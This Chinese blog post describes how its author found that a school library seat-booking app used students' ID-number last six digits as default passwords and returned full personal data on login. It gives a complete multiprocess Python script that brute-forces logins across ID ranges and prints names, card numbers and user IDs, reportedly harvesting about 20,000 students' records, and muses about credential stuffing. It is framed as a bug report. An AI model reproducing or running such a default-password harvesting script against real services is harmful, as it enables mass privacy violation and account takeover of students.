记录一次我是如何爬了某学校近2w学生信息的!

最新推荐文章于 2023-02-14 15:31:50 发布
最新推荐文章于 2023-02-14 15:31:50 发布
阅读量3.4k 收藏 37
点赞数 8
分类专栏: python运维 文章标签: ch' c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37120951/article/details/82286303
版权

     背景:某学校图书馆为了防止占位,新出来一个软件,用于软件预约坐位,就想写个定时软件来每天预约坐位,把软件要来看看怎么实现。这个软件可能刚上线所以很多逻辑有bug,直接返回json包含了所有信息,而且软件默认为学生号后六位登陆。代码实现用python,多进程+协程处理。

    抓包:打开Fiddler抓包,这个就不教程了,如图一,直接抓post登陆数据包,可以很容易发现,太low了吧。。。返回的信息都太全了,有什么不知道的呢?服务器都还是IP直连。出于对别人和软件的隐私,对图片进行处理。

       

                                                                      图一:抓post数据

虽然软件有确认信息验证,但是你信息都返回到json了,就像赤裸裸的美女在哪跳钢管舞,吭~~反正就那个意思,这有什么用呢?只要没有改过密码的学生或者是只是改了简单的6位密码的学生,那岂不是信息都暴露了?

     爬虫:想到这里,那岂不动手试试?ps:这里本人只是尝试,无意拉去个人信息,且信息无保留,仅作提供bug反馈。

那就模拟post直接把学号+学号后6位跑一遍,把学生的姓名,学生卡号,学生号,学生id全部输出出来吧。代码实现如下:

# -*- coding:utf-8 -*-
__author__ = 'longsir'
__date__ = '#=2018/8/31 13:53'
import requests,gevent
import json
import multiprocessing
import sys
reload(sys)
sys.setdefaultencoding('utf8')


def for_id(start_id,end_id):#循环学生id后6位
    for id in range(start_id,end_id):
        list = []#创建一个列表
        userPhysicalCard = str(id).zfill(6)#设置6位数,前面不足补0
        list.append(userPhysicalCard)#把学生后6位仍进去
        t1=gevent.spawn(check_login,list)#创建一个协程,用于加快爬取速度
        t1.join()

def fetch(post_body):#post登陆数据,抓取数据。
    q = requests.post(url="http://IP/tsgintf/main/service", data=json.dumps(post_body))
    if q.json()['result_code'] == '0':
        print(q.json()['result_data']['userName'] + '----' + q.json()['result_data']['userPhysicalCard'] + '----' +
              q.json()['result_data']['studentCard'] + '----' + str(q.json()['result_data']['userId'])) #打印需要的数据
    # else:
    #     print(userPhysicalCard+'----密码错误')

def check_login(list): #用于生成请求数据body
    tasks=[] #定义个协程列表
    for userPhysicalCard in list: #把传过来的数据进行便利,仍进post_body里
        post_body = {"intf_code": "QRY_LOGIN",
                     "params": {"userPhysicalCard": "2018" + userPhysicalCard, "password": userPhysicalCard,
                                "imei": "866146031624376", "pushid": "36100cd24536fc8c18cf", "os": "android",
                                "wmac": "50:8F:4C:F2:D2:1C", "version": "1.1.11", "tversion": 1535597698021,
                                "md5username": "58a4f9d5bbf4b0c658ded53023e6d2d1"}}
        tasks.append(gevent.spawn(fetch, post_body))#创建协程,调用fetch函数,抓取数据
    gevent.joinall(tasks)#多协程操作

if __name__ == '__main__':
    #starttime = datetime.datetime.now()
    process_list=[] #启动多进程
    p1 = multiprocessing.Process(target=for_id, args=(210001, 300000,))
    process_list.append(p1)
    p2 = multiprocessing.Process(target=for_id, args=(300000, 400000,))
    process_list.append(p2)
    p3 = multiprocessing.Process(target=for_id, args=(400000, 500000,))
    process_list.append(p3)
    p4 = multiprocessing.Process(target=for_id, args=(500000, 600000,))
    process_list.append(p4)
    p5 = multiprocessing.Process(target=for_id, args=(600000, 700000,))
    process_list.append(p5)
    p6 = multiprocessing.Process(target=for_id, args=(700000, 800000,))
    process_list.append(p6)
    p7 = multiprocessing.Process(target=for_id, args=(800000, 900000,))
    process_list.append(p7)
    p8 = multiprocessing.Process(target=for_id, args=(900000, 1000000,))
    process_list.append(p8)

    #生成多进程,加快爬取速度
    for p in process_list:
        p.start()
    for p in process_list:
        p.join()

    # p1.start()
    # p2.start()

然后运行该简单的爬虫,把结果重定向处理。

    结语:

  1. 用这么简单的脚本,我竟然爬了近2w的学生数据【如图二】,一共四届学生的全部信息,有了这些信息我能做什么?不用我说了吧,轻点的我可以掌握这部分学生的部分校园信息,重点的我甚至可以撞库,相信大部分大学生为了省事把各种密码就设置成学号后6位吧?虽然没有学生的身份证信息,但是谁有能确认利用这些信息不能获取到呢???                                                           

                                                                         图二:部分学生信息图

      2. 如何加强防范?长点心啊,这些信息为啥返回,不能隐藏后台校验吗?为什么不设置反爬虫机制?我一个ip爬了2w的信息,为什么不封我ip呢?为什么不设置成身份证后6位密码,而是仅仅简单的学号后6位呢?

      3. 此篇文章并没有多大技术含量,仅以此文章反馈贵校软件存在的问题。希望贵校重视此问题并及时修复。

 

Lion-Shen
关注
  • 8
    点赞
  • 37
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
学校信息管理系统详细设计与具体代码实现
程序员光剑
04-18 348
学校信息管理系统详细设计与具体代码实现 1. 背景介绍 1.1 学校信息管理系统的重要性 在当今信息化时代,学校信息管理系统(School Information Management System, SIMS)已经成为现代
gui学生信息管理系统java,Java实训·GUI学生信息管理系统
weixin_35003319的博客
03-13 2312
学生信息管理系统一、功能需求1、可设置学校信息2、可设置状态栏信息3、登录与注册功能4、登录用户修改密码功能5、对学生记录增加和修改6、查询:按学号、姓名、班级和系部进行查询7、删除:按学号、班级、系部删除记录8、统计:按性别、班级、系部统计人数二、功能结构图 三、具体实现步骤a、创建数据库及表数据库student中有4个表:t_college、t_status、t_student、t_user...
python学校学生信息_使用Python学校学生信息!(简单虫)
weixin_39906130的博客
12-02 1028
很久木有来写博文啦,发现学校的教务系统很多童鞋都木有修改初始密码,于是博主就想写试用python写一个虫小脚本,将木有修改初始密码的童鞋资料扒下来,然后嘿嘿嘿~~~通知他们修改!鉴于写博文时未通知这些受害童鞋们,因此隐去关键信息。首先为初始化方法__init__(self)import urllibimport urllib2import cookielibimport reimport xlw...
python输出学生信息_记录Python模拟登录取Mysise学生管理系统的信息
weixin_39972519的博客
11-24 192
进入学生管理系统的登录页面后,笔者用的是谷歌浏览器,按F12启动开发者模式,勾选Preserve log,原因是Mysise有重定向机制,过程中的POST请求会被重定向,不勾选会看不到POST请求Network标签是显示捕获到的信息项登录后捕获到一个POST请求,该请求用于提交用户名和密码(用于登录的真实请求地址)接下来用Python模拟登录需要准备三样信息,第一样是请求地址,在General中可...
学校内网的个人信息
01-08
主要利用jsoup学校内网的个人信息,课表等等,在移动设备上显示,查看
python学校学生信息网_使用python+selenium学生信息并入库
weixin_33148993的博客
02-21 1121
学校的网站上发现了一些有趣的东西,就是能看到同年级的所有学院学生的信息。该页面大概如下 于是好奇的我就打算把所有信息抓取下来。一开始我打算使用 requests + BeautifulSoup 进行模拟取。但是因为上面的 “下一页” 是post一个form, 然后post的参数值需要从当前页面抓取,操作麻烦,而且到最后都没有成功。于是我就打算换一个工具,就选择了 selenium。简单的介绍一...
python学校学生信息_python取老师照片和信息
weixin_39633781的博客
12-02 862
看了《HTML & CSS设计与构建网站》《Python网络数据采集》《从零开始学Python网络虫》,买了并学习了这三本书,感觉很好自己也想一下,把自己读研时学校老师的信息下来,把他们的照片分文件夹下载,并把他们的个人主页保存到一个Excel表里面虫思路介绍一下在里面,有着所有的老师个人信息每个人都在里面里面就有一个和一个,里面有一个,没有和里面有两个第一个里是照片的相对路径第二...
在校学生每日出勤率数据集 CSV 27W+ 记录(School Student Daily Attendance)
最新发布
05-07
每条记录都包括当天的日期、总入学人数、缺席、在场和释放的学生人数。这些结构化数据对于了解日常出勤趋势、学生参与度以及学校环境随时间推移的运营动态至关重要。 从数据科学的角度来看,该数据集是分析教育趋势...
学生考试数据集 CSV(3W+记录)【500010096】
11-13
本数据集为模拟数据,数据包含了公立学校学生的三门考试分数以及可能对他们产生交互影响的各种个人和社会经济因素。 数据说明 字段 说明 分组 学生的种族 每周自学时间 小于5小时;5至10小时;大于10小时
linux实现学生信息管理系统,Linux下基于shell脚本实现学生信息管理系统
weixin_35549786的博客
04-29 2417
LINUXLinux操作系统Linux下基于shell脚本实现学生信息管理系统 #该管理系统是参考两位博主(时间有点远了,我忘了,请博主看到后联系我)后自行修改添加的。登录过程还有很多不完善,我就抛砖引玉啦。废话不多,直接上码!#!/bin/bash# 学生管理系统# @version 1.0#设置全局变量##学生信息和学院信息#学院相关变量school_num=""scho...
python学校学生信息网_Python Scrapy练习-取山东毕业生网站公开信息
weixin_32972053的博客
01-15 268
参考文章版本信息PyCharm Community Edition 2017.2.3C:\Users\long>conda -Vconda 4.3.30C:\Users\long>python -VPython 3.6.2 :: Anaconda, Inc.C:\Users\long>conda list Scrapy# packages in environment at C:...
使用Python学校学生信息!(简单虫)
热门推荐
BlingSmile的博客
02-24 1万+
很久木有来写博文啦,发现学校的教务系统很多童鞋都木有修改初始密码,于是博主就想写试用python写一个虫小脚本,将木有修改初始密码的童鞋资料扒下来,然后嘿嘿嘿~~~通知他们修改!鉴于写博文时未通知这些受害童鞋们,因此隐去关键信息。首先为初始化方法__init__(self) import urllib import urllib2 import cookielib
虫】1.9 实践项目——学生信息
Jack
02-14 1693
" 匹配 HTML 代码,得到第一个 的位置,再使用 r"" 匹配 HTML 字符串,得到第一个 的位置,取出 ..." 与 r"" 的正则表达式分解... 的数据。再次分解这一行的...
湖南科技职业学院教务系统学生信息取存储
danke的博客
03-04 1万+
效果展示 本人为湖南科技职业学院一名云计算大二学生 这几天闲得无事了一手我们学校学生信息,但只有软件学院的,因为我只有软件学院的学生学号 如果有全校的学生学号,估计可以全下来 话不多说直接开始分析: 我记得之前辅导员说过,很多学生忘了教务系统密码,就全部把密码重置为学号 这说明什么,这说明拿到学号就可以登录教务系统了,不得不吐槽这也太草率了 首先我们得先弄到学号,看看我在班级群发现什么好东西了[滑稽.jpg] 我们打开这个文件,哟西,大大地快乐,成功拿到学号 ..
学校教务网信息
weixin_43497769的博客
05-02 701
Python学校教务处的通知 以西南大学为例,取西南大学教务处的相关通知 去网上搜索西南大学教务处的官网 取每个信息的标题和网址 import urllib.request import re from lxml import html etree=html.etree url1=r'http://jwc.swu.edu.cn' res=urllib.request.urlope...
黑客的每日一思(1)--hw如何收集学校学生信息
azraelxuemo的博客
11-05 363
黑客的每日一思
虫实战(1)--学校官网获取成绩
爱吃猪蹄的博客
08-05 4614
虫实战(1)--取正方系统 通过python的requests库取成绩
学校通知信息(python))
junseven164的博客
11-13 2496
呦呦鹿鸣一、虫简介1.1 介绍1.2 软件配置二、取南阳理工学院ACM题目网站三、学校官网的信息通知四、总结五、参考 一、虫简介 1.1 介绍 网络虫英文名叫Web Crawler或Web Spider。它是一种自动浏览网页并采集所需要信息的程序。 虫从初始网页的URL开始, 获取初始网页上的URL,在抓取网页的过程中,不断从当前页面抽取新的url放入队列。直到满足系统给定的停止条件才停止。 可以为搜素引擎从互联网中下载网页数据,是搜素引擎的重要组成部分。 1.2 软件配置 python
虫】scrapy取招生院校专业信息
可乐大牛的博客
06-18 1299
取链接中的大学以及对应的专业,存储为excel表格 这是我第二次做虫,之前做过一次取豆瓣top250电影的虫,感兴趣的可以看链接和链接,前者是使用scrapy框架的,后者是使用request包实现的。 起初我以为这个需求和之前的差不多,毕竟看着页面很简单,但是做起来发现并不是这样。,我最开始的想法是取这个页面,然后根据里面的这个a标签的跳转地址取我们真正想要取的信息。,遗憾的是,这是一个动态的html,相关信息是js控制的,所以上面的思路解决不了了。,观察到,其实这个请求还是有点规律的 也就
python学生信息管理
09-26
### 回答1: 好的,我可以为您提供一些关于Python学生信息管理系统的建议。首先,您需要确定您想要管理哪些学生信息,例如学生姓名、学号、成绩等。接下来,您可以使用Python编写一个能够实现以下功能的程序: 1. 添加学生信息 2. 查找学生信息 3. 修改学生信息 4. 删除学生信息 5. 显示所有学生信息 您可以使用Python中的列表、字典或者类等数据结构来存储学生信息。此外,您可以使用Python中的文件操作来将学生信息保存在本地,以便下次使用时能够读取。 以下是一个简单的Python学生信息管理系统的代码示例,仅供参考: ```python class Student: def __init__(self, name, id, score): self.name = name self.id = id self.score = score class StudentManagementSystem: def __init__(self): self.students = [] def add_student(self, student): self.students.append(student) def find_student(self, id): for student in self.students: if student.id == id: return student return None def modify_student(self, id, name, score): student = self.find_student(id) if student: student.name = name student.score = score return True return False def delete_student(self, id): student = self.find_student(id) if student: self.students.remove(student) return True return False def display_all_students(self): for student in self.students: print(f"Name: {student.name}, ID: {student.id}, Score: {student.score}") def save_to_file(self, filename): with open(filename, "w") as f: for student in self.students: f.write(f"{student.name},{student.id},{student.score}\n") def load_from_file(self, filename): with open(filename, "r") as f: lines = f.readlines() for line in lines: name, id, score = line.strip().split(",") self.add_student(Student(name, id, score)) ``` 您可以通过创建一个`StudentManagementSystem`对象来进行学生信息的管理。例如: ```python sms = StudentManagementSystem() sms.add_student(Student("Tom", "001", 90)) sms.add_student(Student("Jerry", "002", 80)) sms.display_all_students() ``` 这将会打印出所有学生的信息。 还有很多其他的功能和细节可以根据您的具体需求进行实现和完善。希望这些提示对您有所帮助! ### 回答2: Python学生信息管理是一种使用Python编程语言来实现学生信息记录、查询和管理的系统。这个系统可以用于学校、教育机构或者其他组织中对学生信息进行管理。 首先,我们可以使用Python中的类来定义一个学生对象。这个学生对象可以包括学生的姓名、学号、年龄、性别等基本信息。我们可以使用类的属性来存储这些信息,并提供构造函数来初始化这些属性。 其次,我们可以使用Python的列表或字典来存储多个学生对象。列表可以用于按顺序存储学生对象,而字典可以使用学号作为键来存储学生对象。这样,我们就可以根据学号来快速查询到对应的学生对象。 然后,我们可以编写函数来实现对学生信息的增加、删除、修改和查询等操作。例如,我们可以编写一个函数来添加学生信息,输入学生的基本信息,创建学生对象并将其添加到学生列表或字典中。另外,我们还可以编写函数来删除学生信息,根据学号在学生列表或字典中删除对应的学生对象。 最后,我们可以编写一个简单的用户界面来与用户交互。例如,我们可以使用Python的命令行界面或者图形界面库来展示学生信息的列表或字典,用户可以通过输入指令来实现对学生信息的操作。 总之,Python学生信息管理系统是使用Python编程语言来实现对学生信息记录、查询和管理的系统。通过定义学生对象、存储学生信息、编写相关函数和用户界面,我们可以方便地实现对学生信息的各种操作。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值